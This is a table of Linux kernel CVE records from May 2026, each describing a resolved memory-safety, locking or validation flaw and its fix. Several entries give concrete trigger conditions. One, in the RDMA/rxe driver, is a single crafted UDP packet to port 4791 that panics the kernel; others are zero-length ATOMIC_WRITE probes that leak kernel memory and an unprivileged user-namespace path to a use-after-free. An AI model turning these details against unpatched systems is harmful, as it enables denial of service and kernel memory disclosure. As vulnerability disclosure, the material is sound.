| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: nSVM: Raise #UD if unhandled VMMCALL isn't intercepted by L1 Explicitly synthesize a #UD for VMMCALL if L2 is active, L1 does NOT want to intercept VMMCALL, nested_svm_l2_tlb_flush_enabled() is true, and the hypercall is something other than one of the supported Hyper-V hypercalls. When all of the above conditions are met, KVM will intercept VMMCALL but never forward it to L1, i.e. will let L2 make hypercalls as if it were L1. The TLFS says a whole lot of nothing about this scenario, so go with the architectural behavior, which says that VMMCALL #UDs if it's not intercepted. Opportunistically do a 2-for-1 stub trade by stub-ifying the new API instead of the helpers it uses. The last remaining "single" stub will soon be dropped as well. [sean: rewrite changelog and comment, tag for stable, remove defunct stubs] | 2026-05-27 | 7.9 | CVE-2026-46076 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: fix the out-of-bounds nameoff handling for trailing dirents Currently we already have boundary-checks for nameoffs, but the trailing dirents are special since the namelens are calculated with strnlen() with unchecked nameoffs. If a crafted EROFS has a trailing dirent with nameoff >= maxsize, maxsize - nameoff can underflow, causing strnlen() to read past the directory block. nameoff0 should also be verified to be a multiple of `sizeof(struct erofs_dirent)` as well [1]. [1] https://sashiko.dev/#/patchset/20260416063511.3173774-1-hsiangkao%40linux.alibaba.com | 2026-05-27 | 7.1 | CVE-2026-46078 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: acomp - fix wrong pointer stored by acomp_save_req() acomp_save_req() stores &req->chain in req->base.data. When acomp_reqchain_done() is invoked on asynchronous completion, it receives &req->chain as the data argument but casts it directly to struct acomp_req. Since data points to the chain member, all subsequent field accesses are at a wrong offset, resulting in memory corruption. The issue occurs when an asynchronous hardware implementation, such as the QAT driver, completes a request that uses the DMA virtual address interface (e.g. acomp_request_set_src_dma()). This combination causes crypto_acomp_compress() to enter the acomp_do_req_chain() path, which sets acomp_reqchain_done() as the completion callback via acomp_save_req(). With KASAN enabled, this manifests as a general protection fault in acomp_reqchain_done(): general protection fault, probably for non-canonical address 0xe000040000000000 KASAN: probably user-memory-access in range [0x0000400000000000-0x0000400000000007] RIP: 0010:acomp_reqchain_done+0x15b/0x4e0 Call Trace: <IRQ> qat_comp_alg_callback+0x5d/0xa0 [intel_qat] adf_ring_response_handler+0x376/0x8b0 [intel_qat] adf_response_handler+0x60/0x170 [intel_qat] tasklet_action_common+0x223/0x820 handle_softirqs+0x1ab/0x640 </IRQ> Fix this by storing the request itself in req->base.data instead of &req->chain, so that acomp_reqchain_done() receives the correct pointer. Simplify acomp_restore_req() accordingly to access req->chain directly. | 2026-05-27 | 7.8 | CVE-2026-46081 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix rxkad crypto unalignment handling Fix handling of a packet with a misaligned crypto length. Also handle non-ENOMEM errors from decryption by aborting. Further, remove the WARN_ON_ONCE() so that it can't be remotely triggered (a trace line can still be emitted). | 2026-05-27 | 7.5 | CVE-2026-46085 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: aloop: Fix peer runtime UAF during format-change stop loopback_check_format() may stop the capture side when playback starts with parameters that no longer match a running capture stream. Commit 826af7fa62e3 ("ALSA: aloop: Fix racy access at PCM trigger") moved the peer lookup under cable->lock, but the actual snd_pcm_stop() still runs after dropping that lock. A concurrent close can clear the capture entry from cable->streams[] and detach or free its runtime while the playback trigger path still holds a stale peer substream pointer. Keep a per-cable count of in-flight peer stops before dropping cable->lock, and make free_cable() wait for those stops before detaching the runtime. This preserves the existing behavior while making the peer runtime lifetime explicit. | 2026-05-27 | 7.8 | CVE-2026-46090 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/vmalloc: take vmap_purge_lock in shrinker decay_va_pool_node() can be invoked concurrently from two paths: __purge_vmap_area_lazy() when pools are being purged, and the shrinker via vmap_node_shrink_scan(). However, decay_va_pool_node() is not safe to run concurrently, and the shrinker path currently lacks serialization, leading to races and possible leaks. Protect decay_va_pool_node() by taking vmap_purge_lock in the shrinker path to ensure serialization with purge users. | 2026-05-27 | 7.8 | CVE-2026-46093 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs: afs: revert mmap_prepare() change Partially reverts commit 9d5403b1036c ("fs: convert most other generic_file_*mmap() users to .mmap_prepare()"). This is because the .mmap invocation establishes a refcount, but .mmap_prepare is called at a point where a merge or an allocation failure might happen after the call, which would leak the refcount increment. Functionality is being added to permit the use of .mmap_prepare in this case, but in the interim, we need to fix this. | 2026-05-27 | 7.8 | CVE-2026-46100 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: strparser: fix skb_head leak in strp_abort_strp() When the stream parser is aborted, for example after a message assembly timeout, it can still hold a reference to a partially assembled message in strp->skb_head. That skb is not released in strp_abort_strp(), which leaks the partially assembled message and can be triggered repeatedly to exhaust memory. Fix this by freeing strp->skb_head and resetting the parser state in the abort path. Leave strp_stop() unchanged so final cleanup still happens in strp_done() after the work and timer have been synchronized. | 2026-05-27 | 7.5 | CVE-2026-46102 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: mpt3sas: Limit NVMe request size to 2 MiB The HBA firmware reports NVMe MDTS values based on the underlying drive capability. However, because the driver allocates a fixed 4K buffer for the PRP list, accommodating at most 512 entries, the driver supports a maximum I/O transfer size of 2 MiB. Limit max_hw_sectors to the smaller of the reported MDTS and the 2 MiB driver limit to prevent issuing oversized I/O that may lead to a kernel oops. | 2026-05-28 | 7.8 | CVE-2026-46105 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm-thin: fix metadata refcount underflow There's a bug in dm-thin in the function rebalance_children. If the internal btree node has one entry, the code tries to copy all btree entries from the node's child to the node itself and then decrement the child's reference count. If the child node is shared (it has reference count > 1), we won't free it, so there would be two pointers to each of the grandchildren nodes. But the reference counts of the grandchildren are not increased, thus the reference count doesn't match the number of pointers that point to the grandchildren. This results in "device mapper: space map common: unable to decrement block" errors. Fix this bug by incrementing reference counts on the grandchildren if the btree node is shared. | 2026-05-28 | 7.8 | CVE-2026-46107 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: stmmac: Prevent NULL deref when RX memory exhausted The CPU receives frames from the MAC through conventional DMA: the CPU allocates buffers for the MAC, then the MAC fills them and returns ownership to the CPU. For each hardware RX queue, the CPU and MAC coordinate through a shared ring array of DMA descriptors: one descriptor per DMA buffer. Each descriptor includes the buffer's physical address and a status flag ("OWN") indicating which side owns the buffer: OWN=0 for CPU, OWN=1 for MAC. The CPU is only allowed to set the flag and the MAC is only allowed to clear it, and both must move through the ring in sequence: thus the ring is used for both "submissions" and "completions." In the stmmac driver, stmmac_rx() bookmarks its position in the ring with the `cur_rx` index. The main receive loop in that function checks for rx_descs[cur_rx].own=0, gives the corresponding buffer to the network stack (NULLing the pointer), and increments `cur_rx` modulo the ring size. After the loop exits, stmmac_rx_refill(), which bookmarks its position with `dirty_rx`, allocates fresh buffers and rearms the descriptors (setting OWN=1). If it fails any allocation, it simply stops early (leaving OWN=0) and will retry where it left off when next called. This means descriptors have a three-stage lifecycle (terms my own): - `empty` (OWN=1, buffer valid) - `full` (OWN=0, buffer valid and populated) - `dirty` (OWN=0, buffer NULL) But because stmmac_rx() only checks OWN, it confuses `full`/`dirty`. In the past (see 'Fixes:'), there was a bug where the loop could cycle `cur_rx` all the way back to the first descriptor it dirtied, resulting in a NULL dereference when mistaken for `full`. The aforementioned commit resolved that *specific* failure by capping the loop's iteration limit at `dma_rx_size - 1`, but this is only a partial fix: if the previous stmmac_rx_refill() didn't complete, then there are leftover `dirty` descriptors that the loop might encounter without needing to cycle fully around. The current code therefore panics (see 'Closes:') when stmmac_rx_refill() is memory-starved long enough for `cur_rx` to catch up to `dirty_rx`. Fix this by explicitly checking, before advancing `cur_rx`, if the next entry is dirty; exit the loop if so. This prevents processing of the final, used descriptor until stmmac_rx_refill() succeeds, but fully prevents the `cur_rx == dirty_rx` ambiguity as the previous bugfix intended: so remove the clamp as well. Since stmmac_rx_zc() is a copy-paste-and-tweak of stmmac_rx() and the code structure is identical, any fix to stmmac_rx() will also need a corresponding fix for stmmac_rx_zc(). Therefore, apply the same check there. In stmmac_rx() (not stmmac_rx_zc()), a related bug remains: after the MAC sets OWN=0 on the final descriptor, it will be unable to send any further DMA-complete IRQs until it's given more `empty` descriptors. Currently, the driver simply *hopes* that the next stmmac_rx_refill() succeeds, risking an indefinite stall of the receive process if not. But this is not a regression, so it can be addressed in a future change. | 2026-05-28 | 7.5 | CVE-2026-46110 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_conn: fix potential UAF in create_big_sync Add hci_conn_valid() check in create_big_sync() to detect stale connections before proceeding with BIG creation. Handle the resulting -ECANCELED in create_big_complete() and re-validate the connection under hci_dev_lock() before dereferencing, matching the pattern used by create_le_conn_complete() and create_pa_complete(). Keep the hci_conn object alive across the async boundary by taking a reference via hci_conn_get() when queueing create_big_sync(), and dropping it in the completion callback. The refcount and the lock are complementary: the refcount keeps the object allocated, while hci_dev_lock() serializes hci_conn_hash_del()'s list_del_rcu() on hdev->conn_hash, as required by hci_conn_del(). hci_conn_put() is called outside hci_dev_unlock() so the final put (which resolves to kfree() via bt_link_release) does not run under hdev->lock, though the release path would be safe either way. Without this, create_big_complete() would unconditionally dereference the conn pointer on error, causing a use-after-free via hci_connect_cfm() and hci_conn_del(). | 2026-05-28 | 7.8 | CVE-2026-46111 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/hns: Fix unlocked call to hns_roce_qp_remove() Sashiko points out that hns_roce_qp_remove() requires the caller to hold locks. The error flow in hns_roce_create_qp_common() doesn't hold those locks for the error unwind so it risks corrupting memory. Grab the same locks the other two callers use. | 2026-05-28 | 7.8 | CVE-2026-46112 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Reject non-8-byte ATOMIC_WRITE payloads atomic_write_reply() at drivers/infiniband/sw/rxe/rxe_resp.c unconditionally dereferences 8 bytes at payload_addr(pkt): value = *(u64 *)payload_addr(pkt); check_rkey() previously accepted an ATOMIC_WRITE request with pktlen == resid == 0 because the length validation only compared pktlen against resid. A remote initiator that sets the RETH length to 0 therefore reaches atomic_write_reply() with a zero-byte logical payload, and the responder reads sizeof(u64) bytes from past the logical end of the packet into skb->head tailroom, then writes those 8 bytes into the attacker's MR via rxe_mr_do_atomic_write(). That is a remote disclosure of 4 bytes of kernel tailroom per probe (the other 4 bytes are the packet's own trailing ICRC). IBA oA19-28 defines ATOMIC_WRITE as exactly 8 bytes. Anything else is protocol-invalid. Hoist a strict length check into check_rkey() so the responder never reaches the unchecked dereference, and keep the existing WRITE-family length logic for the normal RDMA WRITE path. Reproduced on mainline with an unmodified rxe driver: a sustained zero-length ATOMIC_WRITE probe repeatedly leaks adjacent skb head-buffer bytes into the attacker's MR, including recognisable kernel strings and partial kernel-direct-map pointer words. With this patch applied the responder rejects the PDU and the MR stays all-zero. | 2026-05-28 | 7.5 | CVE-2026-46114 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: defensively unhash xfrm_state lists in __xfrm_state_delete KASAN reproduces a slab-use-after-free in __xfrm_state_delete()'s hlist_del_rcu calls under syzkaller load on linux-6.12.y stable (reproduced on 6.12.47, also reachable via the same code path on torvalds/master and on the ipsec tree). Nine unique signatures cluster in the xfrm_state lifecycle, the load-bearing one being: BUG: KASAN: slab-use-after-free in __hlist_del include/linux/list.h:990 [inline] BUG: KASAN: slab-use-after-free in hlist_del_rcu include/linux/rculist.h:516 [inline] BUG: KASAN: slab-use-after-free in __xfrm_state_delete net/xfrm/xfrm_state.c Write of size 8 at addr ffff8881198bcb70 by task kworker/u8:9/435 Workqueue: netns cleanup_net Call Trace: __hlist_del / hlist_del_rcu __xfrm_state_delete xfrm_state_delete xfrm_state_flush xfrm_state_fini ops_exit_list cleanup_net The other observed signatures hit the same slab object from __xfrm_state_lookup, xfrm_alloc_spi, __xfrm_state_insert and an OOB write variant of __xfrm_state_delete, all on the byseq/byspi hash chains. __xfrm_state_delete() guards its byseq and byspi unhashes with value-based predicates: if (x->km.seq) hlist_del_rcu(&x->byseq); if (x->id.spi) hlist_del_rcu(&x->byspi); while everywhere else in the file (e.g. state_cache, state_cache_input) the safer hlist_unhashed() check is used. xfrm_alloc_spi() sets x->id.spi = newspi inside xfrm_state_lock and then immediately inserts into byspi, but a path that observes x->id.spi != 0 outside of xfrm_state_lock can still skip-or-hit the byspi unhash inconsistently with whether x is actually on the list. The same holds for x->km.seq versus byseq, and the bydst/bysrc unhashes have no predicate at all, so a second __xfrm_state_delete() on the same object writes through LIST_POISON pprev. The defensive change here: - Use hlist_del_init_rcu() instead of hlist_del_rcu() on bydst, bysrc, byseq and byspi so a second deletion is a no-op rather than a write through LIST_POISON pprev. The byseq/byspi nodes are already initialised in xfrm_state_alloc(). - Test hlist_unhashed() rather than the value predicate for byseq/byspi, so the unhash decision tracks list state rather than mutable scalar fields. Empirical verification: applied this patch on top of v6.12.47, rebuilt, and re-ran the same syzkaller harness for 1h16m on a previously-crashy configuration that produced ~100 hits each of slab-use-after-free Read in xfrm_alloc_spi / Read in __xfrm_state_lookup / Write in __xfrm_state_delete. After the patch, 7.1M execs across 32 VMs at ~1550 exec/sec produced zero xfrm_state UAF/OOB hits. /proc/slabinfo confirms the xfrm_state slab is actively allocated and freed during the run (~143 KiB resident), so the fuzzer is still exercising those code paths -- they just no longer crash. Reproduction: - Linux 6.12.47 x86_64 + KASAN_GENERIC + KASAN_INLINE + KCOV - syzkaller @ 746545b8b1e4c3a128db8652b340d3df90ce61db - 32 QEMU/KVM VMs x 2 vCPU on AWS c5.metal bare metal - 9 unique signatures collected in ~9h, all within xfrm_state lifecycle | 2026-05-28 | 7.8 | CVE-2026-46116 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mana: Remove user triggerable WARN_ON() in mana_ib_create_qp_rss() Sashiko points out that the user can specify WQs sharing the same CQ as a part of the uAPI and this will trigger the WARN_ON() then go on to corrupt the kernel. Just reject it outright and fail the QP creation. | 2026-05-28 | 7.8 | CVE-2026-46117 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ip6_gre: Use cached t->net in ip6erspan_changelink(). After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops"), ip6erspan_newlink() correctly resolves the per-netns ip6gre hash via link_net. ip6erspan_changelink() was not converted in that series and still uses dev_net(dev), which diverges from the device's creation netns after IFLA_NET_NS_FD migration. This re-inserts the tunnel into the wrong per-netns hash. The original netns keeps a stale entry. When that netns is later destroyed, ip6gre_exit_rtnl_net() walks the stale entry, producing a slab-use-after-free reported by KASAN, followed by a kernel BUG at net/core/dev.c (LIST_POISON1) in unregister_netdevice_many_notify(). Reachable from an unprivileged user namespace (unshare --user --map-root-user --net). ip6gre_changelink() earlier in the same file already uses the cached t->net; only ip6erspan_changelink() has the wrong shape. | 2026-05-28 | 7.8 | CVE-2026-46120 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: virtio_bt: clamp rx length before skb_put virtbt_rx_work() calls skb_put(skb, len) where len comes directly from virtqueue_get_buf() with no validation against the buffer we posted to the device. The RX skb is allocated in virtbt_add_inbuf() and exposed to virtio as exactly 1000 bytes via sg_init_one(). Checking len against skb_tailroom(skb) is not sufficient because alloc_skb() can leave more tailroom than the 1000 bytes actually handed to the device. A malicious or buggy backend can therefore report used.len between 1001 and skb_tailroom(skb), causing skb_put() to include uninitialized kernel heap bytes that were never written by the device. The same path also accepts len == 0, in which case skb_put(skb, 0) leaves the skb empty but virtbt_rx_handle() still reads the pkt_type byte from skb->data, consuming uninitialized memory. Define VIRTBT_RX_BUF_SIZE once and reuse it in alloc_skb() and sg_init_one(), and gate virtbt_rx_work() on that same constant so the bound checked matches the buffer actually exposed to the device. Reject used.len == 0 in the same gate so an empty completion can no longer reach virtbt_rx_handle(). Use bt_dev_err_ratelimited() because the length value comes from an untrusted backend that can otherwise flood the kernel log. Same class of bug as commit c04db81cd028 ("net/9p: Fix buffer overflow in USB transport layer"), which hardened the USB 9p transport against unchecked device-reported length. | 2026-05-28 | 7.7 | CVE-2026-46123 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: isofs: validate block number from NFS file handle in isofs_export_iget isofs_fh_to_dentry() and isofs_fh_to_parent() pass an attacker-controlled block number (ifid->block or ifid->parent_block) from the NFS file handle to isofs_export_iget(), which only rejects block == 0 before calling isofs_iget() and ultimately sb_bread(). A crafted file handle with fh_len sufficient to pass the check added by commit 0405d4b63d08 ("isofs: Prevent the use of too small fid") can still drive the server to read any in-range block on the backing device as if it were an iso_directory_record. That earlier fix was assigned CVE-2025-37780. sb_bread() on an out-of-range block returns NULL cleanly via the EIO path, so there is no memory-safety violation. For in-range reads of adjacent-partition data on the same block device, the unrelated bytes end up in iso_inode_info fields that reach the NFS client as dentry metadata. The deployment surface (isofs exported over NFS from loop-mounted images) is narrow and requires an authenticated NFS peer, but the malformed-file-handle class is reportable as hardening next to the existing CVE-2025-37780 fix. Reject block >= ISOFS_SB(sb)->s_nzones in isofs_export_iget() so the check covers both isofs_fh_to_dentry() and isofs_fh_to_parent() call sites with a single line. | 2026-05-28 | 7.5 | CVE-2026-46124 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix double free in create_space_info() error path When kobject_init_and_add() fails, the call chain is: create_space_info() -> btrfs_sysfs_add_space_info_type() -> kobject_init_and_add() -> failure -> kobject_put(&space_info->kobj) -> space_info_release() -> kfree(space_info) Then control returns to create_space_info(): btrfs_sysfs_add_space_info_type() returns error -> goto out_free -> kfree(space_info) This causes a double free. Keep the direct kfree(space_info) for the earlier failure path, but after btrfs_sysfs_add_space_info_type() has called kobject_put(), let the kobject release callback handle the cleanup. | 2026-05-28 | 7.8 | CVE-2026-46129 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Reject unknown opcodes before ICRC processing Even after applying commit 7244491dab34 ("RDMA/rxe: Validate pad and ICRC before payload_size() in rxe_rcv"), a single unauthenticated UDP packet can still trigger panic. That patch handled payload_size() underflow only for valid opcodes with short packets, not for packets carrying an unknown opcode. The unknown-opcode OOB read described below predates that commit and reaches back to the initial Soft RoCE driver. The check added there reads pkt->paylen < header_size(pkt) + bth_pad(pkt) + RXE_ICRC_SIZE where header_size(pkt) expands to rxe_opcode[pkt->opcode].length. The rxe_opcode[] array has 256 entries but is only populated for defined IB opcodes; any other entry (for example opcode 0xff) is zero-initialized, so length == 0 and the check degenerates to pkt->paylen < 0 + bth_pad(pkt) + RXE_ICRC_SIZE which does not constrain pkt->paylen enough. rxe_icrc_hdr() then computes rxe_opcode[pkt->opcode].length - RXE_BTH_BYTES which underflows when length == 0 and passes a huge value to rxe_crc32(), causing an out-of-bounds read of the skb payload. Reproduced on v7.0-rc7 with that fix applied, QEMU/KVM with CONFIG_RDMA_RXE=y and CONFIG_KASAN=y, after rdma link add rxe0 type rxe netdev eth0 A single 48-byte UDP packet to port 4791 with BTH opcode=0xff and QPN=IB_MULTICAST_QPN triggers: BUG: KASAN: slab-out-of-bounds in crc32_le+0x115/0x170 Read of size 1 at addr ... The buggy address is located 0 bytes to the right of allocated 704-byte region Call Trace: crc32_le+0x115/0x170 rxe_icrc_hdr.isra.0+0x226/0x300 rxe_icrc_check+0x13f/0x3a0 rxe_rcv+0x6e1/0x16e0 rxe_udp_encap_recv+0x20a/0x320 udp_queue_rcv_one_skb+0x7ed/0x12c0 Subsequent packets with the same shape fault on unmapped memory and panic the kernel. The trigger requires only module load and "rdma link add"; no QP, no connection, and no authentication. Fix this by rejecting packets whose opcode has no rxe_opcode[] entry, detected via the zero mask or zero length, before any length arithmetic runs. | 2026-05-28 | 7.5 | CVE-2026-46133 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mana: Validate rx_hash_key_len Sashiko points out that rx_hash_key_len comes from a uAPI structure and is blindly passed to memcpy, allowing the userspace to trash kernel memory. Bounds check it so the memcpy cannot overflow. | 2026-05-28 | 7.8 | CVE-2026-46145 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: target: configfs: Bound snprintf() return in tg_pt_gp_members_show() target_tg_pt_gp_members_show() formats LUN paths with snprintf() into a 256-byte stack buffer, then memcpy()s cur_len bytes from that buffer. snprintf() returns the length the output would have had, which can exceed the buffer size when the fabric WWN is long, because iSCSI IQN names can be up to 223 bytes. The check at the memcpy() site only guards the destination page write, not the source read, so memcpy() will read past the stack buffer and copy adjacent stack contents to the sysfs reader; when CONFIG_FORTIFY_SOURCE is enabled, fortify_panic() will be triggered instead. Commit 27e06650a5ea ("scsi: target: target_core_configfs: Add length check to avoid buffer overflow") added the same bound to target_lu_gp_members_show(), but the tg_pt_gp variant was missed, so resolve that here. | 2026-05-28 | 7.1 | CVE-2026-46149 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fanotify: fix false positive on permission events fsnotify_get_mark_safe() may return false for a mark on an unrelated group, which results in bypassing the permission check. Fix by skipping over detached marks that are not in the current group. | 2026-05-28 | 7.1 | CVE-2026-46150 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched_ext: Read scx_root under scx_cgroup_ops_rwsem in cgroup setters scx_group_set_{weight,idle,bandwidth}() cache scx_root before acquiring scx_cgroup_ops_rwsem, so the pointer can be stale by the time the op runs. If the loaded scheduler is disabled and freed (via RCU work) and another is enabled between the naked load and the rwsem acquire, the reader sees scx_cgroup_enabled=true (the new scheduler's) but dereferences the freed one - UAF on SCX_HAS_OP(sch, ...) / SCX_CALL_OP(sch, ...). scx_cgroup_enabled is toggled only under scx_cgroup_ops_rwsem write (scx_cgroup_{init,exit}), so reading scx_root inside the rwsem read section correlates @sch with the enabled snapshot. | 2026-05-28 | 7 | CVE-2026-46154 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: pcm: oss: Fix data race at accessing runtime.oss.trigger Currently the runtime.oss.trigger field may be accessed concurrently without protection, which may lead to a data race. In this case it may lead to a more severe problem because it is a bit field: writing the data may overwrite other bit fields as well, which confuses the operation completely, as spotted by fuzzing. Fix it by covering the runtime.oss.trigger bit field also with the existing params_lock mutex in both snd_pcm_oss_get_trigger() and snd_pcm_oss_poll(). | 2026-05-28 | 7.8 | CVE-2026-46157 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix double free in create_space_info_sub_group() error path When kobject_init_and_add() fails, the call chain is: create_space_info_sub_group() -> btrfs_sysfs_add_space_info_type() -> kobject_init_and_add() -> failure -> kobject_put(&sub_group->kobj) -> space_info_release() -> kfree(sub_group) Then control returns to create_space_info_sub_group(), where: btrfs_sysfs_add_space_info_type() returns error -> kfree(sub_group) Thus, sub_group is freed twice. Keep parent->sub_group[index] = NULL for the failure path, but after btrfs_sysfs_add_space_info_type() has called kobject_put(), let the kobject release callback handle the cleanup. | 2026-05-28 | 7 | CVE-2026-46164 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: exit: prevent preemption of oopsing TASK_DEAD task When an already-exiting task oopses, make_task_dead() currently calls do_task_dead() with preemption enabled. That is forbidden: do_task_dead() calls __schedule(), which has a comment saying "WARNING: must be called with preemption disabled!". If an oopsing task is preempted in do_task_dead(), between becoming TASK_DEAD and entering the scheduler explicitly, bad things happen: finish_task_switch() assumes that once the scheduler has switched away from a TASK_DEAD task, the task can never run again and its stack is no longer needed; but that assumption apparently doesn't hold if the dead task was preempted (the SM_PREEMPT case). This means that the scheduler ends up repeatedly dropping references on the dead task's stack, which can lead to use-after-free or double-free of the entire task stack; in other words, two tasks can end up running on the same stack, resulting in various kinds of memory corruption. (This does not just affect "recursively oopsing" tasks; it is enough to oops once during task exit, for example in a file_operations::release handler.) | 2026-05-28 | 7.8 | CVE-2026-46173 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix fsck inconsistency caused by FGGC of node block During FGGC node block migration, fsck may incorrectly treat the migrated node block as fsync-written data. The reproduction scenario: `root@vm:/mnt/f2fs# seq 1 2048 \| xargs -n 1 ./test_sync` (write inline inode and sync); `root@vm:/mnt/f2fs# rm -f 1`; `root@vm:/mnt/f2fs# sync`; `root@vm:/mnt/f2fs# f2fs_io gc_range` (move data block in sync mode and do not write CP); after SPO, "fsck --dry-run" finds the inode has already been checkpointed but still has DENT_BIT_SHIFT set. The root cause is that GC does not clear the dentry mark and fsync mark during node block migration, leading fsck to misinterpret them as user-issued fsync writes. In BGGC mode, node block migration is handled by f2fs_sync_node_pages(), which guarantees the dentry and fsync marks are cleared before writing. This patch moves the set/clear of the fsync\|dentry marks into __write_node_folio to make the logic clearer, and ensures the fsync\|dentry mark is cleared in FGGC. | 2026-05-28 | 7.1 | CVE-2026-46175 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mlx5: Fix error path fall-through in mlx5_ib_dev_res_srq_init() mlx5_ib_dev_res_srq_init() allocates two SRQs, s0 and s1. When ib_create_srq() fails for s1, the error branch destroys s0 but falls through and unconditionally assigns the freed s0 and the ERR_PTR s1 to devr->s0 and devr->s1. This leads to several problems: the lock-free fast path checks "if (devr->s1) return 0;" and treats the ERR_PTR as already initialised; users in mlx5_ib_create_qp() dereference the freed SRQ or ERR_PTR via to_msrq(devr->s0)->msrq.srqn; and mlx5_ib_dev_res_cleanup() dereferences the ERR_PTR and double-frees s0 on teardown. Fix by adding the same `goto unlock` in the s1 failure path. | 2026-05-28 | 7.8 | CVE-2026-46176 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipmi: Add limits to event and receive message requests The driver would just fetch events and receive messages until the BMC said it was done. To avoid issues with BMCs that never say they are done, add a limit of 10 fetches at a time. In addition, an si interface has an attn state it can return from the hardware which is supposed to cause a flag fetch to see if the driver needs to fetch events or messages or a few other things. If the attn bit gets stuck, it's a similar problem. So allow messages in between flag fetches so the driver itself doesn't get stuck. This is a more general fix than the previous fix for the specific bad BMC, but should fix the more general issue of a BMC that won't stop saying it has data. This has been there from the beginning of the driver. It's not a bug per se, but it is accounting for bugs in BMCs. | 2026-05-28 | 7.5 | CVE-2026-46177 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mlx4: Fix resource leak on error in mlx4_ib_create_srq() Sashiko points out that mlx4_srq_alloc() was not undone during error unwind; add the missing call to mlx4_srq_free(). | 2026-05-28 | 7.8 | CVE-2026-46178 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mlx4: Fix mis-use of RCU in mlx4_srq_event() Sashiko points out the radix_tree itself is RCU safe, but nothing ever frees the mlx4_srq struct with RCU, and it isn't even accessed within the RCU critical section. It also will crash if an event is delivered before the srq object is finished initializing. Use the spinlock since it isn't easy to make RCU work, use refcount_inc_not_zero() to protect against partially initialized objects, and order the refcount_set() to be after the srq is fully initialized. | 2026-05-28 | 7.8 | CVE-2026-46181 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mtd: spi-nor: debugfs: fix out-of-bounds read in spi_nor_params_show() Sashiko noticed an out-of-bounds read [1]. In spi_nor_params_show(), the snor_f_names array is passed to spi_nor_print_flags() using sizeof(snor_f_names). Since snor_f_names is an array of pointers, sizeof() returns the total number of bytes occupied by the pointers (element_count * sizeof(void *)) rather than the element count itself. On 64-bit systems, this makes the passed length 8x larger than intended. Inside spi_nor_print_flags(), the 'names_len' argument is used to bounds-check the 'names' array access. An out-of-bounds read occurs if a flag bit is set that exceeds the array's actual element count but is within the inflated byte-size count. Correct this by using ARRAY_SIZE() to pass the actual number of string pointers in the array. | 2026-05-28 | 7.1 | CVE-2026-46190 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: validate SVM ioctl nattr against buffer size Validate nattr field against the buffer size, preventing out-of-bounds buffer access via user-controlled attribute count. (cherry picked from commit 5eca8bfdfa456c3304ca77523718fe24254c172f) | 2026-05-28 | 7.8 | CVE-2026-46197 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/vcn4: Prevent OOB reads when parsing dec msg Check bounds against the end of the BO whenever we access the msg. | 2026-05-28 | 7.1 | CVE-2026-46199 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe: Fix dma-buf attachment leak in xe_gem_prime_import() When xe_dma_buf_init_obj() fails, the attachment from dma_buf_dynamic_attach() is not detached. Add dma_buf_detach() before returning the error. Note: we cannot use goto out_err here because xe_dma_buf_init_obj() already frees bo on failure, and out_err would double-free it. (cherry picked from commit a828eb185aac41800df8eae4b60501ccc0dbbe51) | 2026-05-28 | 7.8 | CVE-2026-46201 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/vcn4: Prevent OOB reads when parsing IB Rewrite the IB parsing to use amdgpu_ib_get_value() which handles the bounds checks. | 2026-05-28 | 7.1 | CVE-2026-46204 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: media: atomisp: Disallow all private IOCTLs Disallow all private IOCTLs. These aren't quite as safe as one could assume of IOCTL handlers; disable them for now. Instead of removing the code, return in the beginning of the function if cmd is non-zero in order to keep static checkers happy. | 2026-05-28 | 7.8 | CVE-2026-46205 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: batman-adv: reject new tp_meter sessions during teardown Prevent tp_meter from starting new sender or receiver sessions after mesh_state has left BATADV_MESH_ACTIVE. | 2026-05-28 | 7.8 | CVE-2026-46206 |
